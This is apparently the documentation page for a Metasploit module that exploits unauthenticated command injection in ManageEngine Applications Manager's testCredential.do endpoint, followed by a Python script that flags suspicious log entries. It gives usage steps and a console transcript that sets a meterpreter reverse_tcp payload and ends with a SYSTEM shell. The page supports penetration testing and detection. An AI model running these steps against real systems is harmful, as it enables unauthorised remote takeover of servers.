## Vulnerable Application

This module exploits a command injection vulnerability in the ManageEngine Applications Manager product. An unauthenticated user can execute an operating system command in the context of a privileged user. The publicly accessible `testCredential.do` endpoint takes multiple user inputs and validates the supplied credentials by accessing the given system. This endpoint calls several internal classes and then executes a PowerShell script without validating the user-supplied parameter when the given system is `OfficeSharePointServer`.

**Vulnerable Application Installation Steps**

Go to the following website and download the Windows version of the product. It comes with built-in Java and PostgreSQL, so you don't need to install anything else.

[http://archives.manageengine.com/applications_manager/13630/](http://archives.manageengine.com/applications_manager/13630/)

## Verification Steps

A successful check of the exploit will look like this:

* Start `msfconsole`
* `use exploit/windows/http/manageengine_appmanager_exec`
* Set `RHOST`
* Set `PAYLOAD windows/meterpreter/reverse_tcp`
* Set `LHOST`
* Run `check`
* **Verify** that you are seeing `The target is vulnerable.` in the console.
* Run `exploit`
* **Verify** that you are seeing `Triggering the vulnerability` in the console.
* **Verify** that you are seeing `Sending stage to` in the console.
* **Verify** that you have your shell.

## Scenarios

```
msf5 >
msf5 > use exploit/windows/http/manageengine_appmanager_exec
msf5 exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192
RHOST => 12.0.0.192
msf5 exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf5 exploit(windows/http/manageengine_appmanager_exec) > check
[+] 12.0.0.192:9090 The target is vulnerable.
msf5 exploit(windows/http/manageengine_appmanager_exec) > run
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Trigerring the vulnerability
[*] Sending stage (179779 bytes) to 12.0.0.192
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
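From the defender's side, the two facts above (an unauthenticated hit on `testCredential.do`, and the `OfficeSharePointServer` system type being the path that reaches PowerShell) are enough to build a simple web-log triage rule. The following is an added example, not code from the Metasploit module or from ManageEngine; the Common Log Format lines and the query-string key `type` are constructed assumptions, since the page does not name the product's real parameter names.

```python
# Added example (not part of the module or the product): triage Tomcat-style
# access log lines for requests to the testCredential.do endpoint, raising the
# severity when the request also carries the OfficeSharePointServer type.
# The log format and the query-string key name are constructed assumptions.
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Common Log Format; "type" is a placeholder key,
# not the product's real parameter name.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2019:13:55:36 +0000] "GET /index.do HTTP/1.1" 200 5120
10.0.0.7 - - [10/Oct/2019:13:55:40 +0000] "POST /testCredential.do?type=OfficeSharePointServer HTTP/1.1" 200 312
10.0.0.9 - - [10/Oct/2019:13:55:41 +0000] "POST /testCredential.do?type=WebServer HTTP/1.1" 200 310
10.0.0.7 - - [10/Oct/2019:13:55:45 +0000] "GET /images/logo.png HTTP/1.1" 304 0
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

TRIGGER_ENDPOINT = "/testcredential.do"
TRIGGER_TYPE = "officesharepointserver"


def classify(line):
    """Return None for a benign line, else a dict describing the finding."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path.lower() != TRIGGER_ENDPOINT:
        return None
    # Compare every query value case-insensitively; the real key is unknown.
    values = [v.lower() for vs in parse_qs(parts.query).values() for v in vs]
    severity = "high" if TRIGGER_TYPE in values else "medium"
    return {"src": m.group("src"), "ts": m.group("ts"),
            "method": m.group("method"), "severity": severity}


def scan(log_text):
    """Classify every non-empty line; return only the findings, in log order."""
    findings = [classify(l) for l in log_text.splitlines() if l.strip()]
    return [f for f in findings if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ts']} {f['src']} {f['method']}")
```

Any hit on this endpoint from a source that should not be logged in is worth a look; the `high` finding is the one that matches the code path this module abuses.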